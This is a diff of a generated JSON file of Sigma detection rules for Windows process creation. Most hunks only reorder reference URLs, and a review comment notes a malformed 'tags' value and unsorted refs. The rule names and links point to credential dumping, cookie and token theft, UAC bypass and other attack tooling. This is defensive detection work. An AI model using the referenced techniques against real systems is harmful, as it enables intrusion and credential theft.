@@ -56634,10 +56634,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", - "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", + "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", + "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" ], "tags": [ @@ -56671,8 +56671,8 @@ "logsource.product": "windows", "refs": [ "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://twitter.com/splinter_code/status/1483815103279603714", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://twitter.com/splinter_code/status/1483815103279603714", "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" ], @@ -56694,8 +56694,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", + "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" ], 
@@ -56754,8 +56754,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", + "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" ], "tags": [ @@ -56797,8 +56797,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" ], @@ -56935,8 +56935,8 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", - "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/fireeye/DueDLLigence", + "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" ], "tags": [ 
@@ -57002,9 +57002,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/tevora-threat/SharpView/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/tevora-threat/SharpView/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" ], "tags": [ @@ -57055,8 +57055,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" ], "tags": [ @@ -57080,8 +57080,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", + "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" ], 
@@ -57182,8 +57182,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/software/S0108/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", + "https://attack.mitre.org/software/S0108/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" ], "tags": [ @@ -57241,8 +57241,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://tools.thehacker.recipes/mimikatz/modules", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" ], "tags": [ @@ -57366,8 +57366,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://github.com/defaultnamehere/cookie_crimes/", + "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml" 
@@ -57481,8 +57481,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/03/30/weak-service-permissions/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/30/weak-service-permissions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" ], "tags": [ @@ -57508,8 +57508,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", "https://cyber.wtf/2021/11/15/guess-whos-back/", + "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" ], "tags": [ @@ -57566,8 +57566,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" ], "tags": [ @@ -57600,8 +57600,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" ], "tags": [ 
@@ -57624,9 +57624,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", "https://www.joesandbox.com/analysis/476188/1/iochtml", "https://twitter.com/neonprimetime/status/1435584010202255375", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" ], "tags": [ @@ -57659,8 +57659,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", "https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" ], "tags": [ @@ -57694,8 +57694,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" ], "tags": [ 
@@ -57720,9 +57720,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", + "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" ], "tags": [ @@ -57823,8 +57823,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml" ], "tags": [ @@ -57917,8 +57917,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" ], "tags": [ 
@@ -58119,8 +58119,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" ], "tags": [ @@ -58213,8 +58213,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ @@ -58272,8 +58272,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", + "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" ], "tags": [ 
@@ -58297,9 +58297,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" ], @@ -58324,8 +58324,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", + "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" ], "tags": [ 
@@ -58349,9 +58349,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" ], "tags": [ @@ -58500,8 +58500,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/972186477512839170", - "https://securelist.com/apt-slingshot/84312/", "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", + "https://securelist.com/apt-slingshot/84312/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" ], "tags": [ @@ -58535,9 +58535,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "http://www.xuetr.com/", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" ], "tags": "No established tags" 
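Review bot: In the last hunk on this line (the PCHunter rule at 58535) the `tags` field is the string `"No established tags"`, while every other rule in these hunks carries `"tags": [ ... ]`; a consumer that iterates `tags` as a list will get single characters or fail depending on the language, so the generator should emit `"tags": []` (or omit the key) for a rule with no tags instead of a placeholder string. The `-`/`+` pairs in these hunks only swap the position of identical `refs` entries, which looks like the generator serialises an unordered set — sorting `refs` before writing would make regenerations diff-free and let a genuinely new or altered reference URL stand out in review, which matters for a file whose links analysts will follow from detection tooling. The object that holds this `tags` field starts and ends outside the hunk.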
@@ -58559,13 +58559,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", - "https://twitter.com/xorJosh/status/1598646907802451969", - "https://ngrok.com/docs", - "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://www.softwaretestinghelp.com/how-to-use-ngrok/", + "https://ngrok.com/docs", + "https://twitter.com/xorJosh/status/1598646907802451969", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" ], "tags": [ @@ -58645,8 +58645,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" 
@@ -58733,8 +58733,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/pabraeken/status/999090532839313408", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", "https://twitter.com/pabraeken/status/995837734379032576", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" ], "tags": [ @@ -58767,8 +58767,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" ], "tags": [ @@ -58850,8 +58850,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", "https://github.com/skelsec/pypykatz", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" ], "tags": [ 
@@ -58884,9 +58884,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", - "https://twitter.com/bohops/status/1477717351017680899?s=12", "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", + "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" ], "tags": [ @@ -58909,9 +58909,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://twitter.com/0gtweet/status/1564968845726580736", "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" ], "tags": [ 
@@ -59004,10 +59004,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" ], "tags": [ @@ -59109,8 +59109,8 @@ "refs": [ "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" ], "tags": [ 
@@ -59328,8 +59328,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", + "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" ], "tags": [ @@ -59521,8 +59521,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", "https://github.com/GhostPack/Rubeus", + "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" ], 
@@ -59635,11 +59635,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", + "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", - "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" ], "tags": [ @@ -59810,8 +59810,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://nsudo.m2team.org/en-us/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" ], "tags": [ 
@@ -59878,10 +59878,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", - "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", + "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" ], "tags": [ @@ -59915,8 +59915,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" ], "tags": [ @@ -59971,8 +59971,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" ], "tags": [ 
@@ -60074,8 +60074,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" ], "tags": [ @@ -60110,8 +60110,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_shtinkering.yml" ], "tags": [ @@ -60287,8 +60287,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" ], "tags": [ 
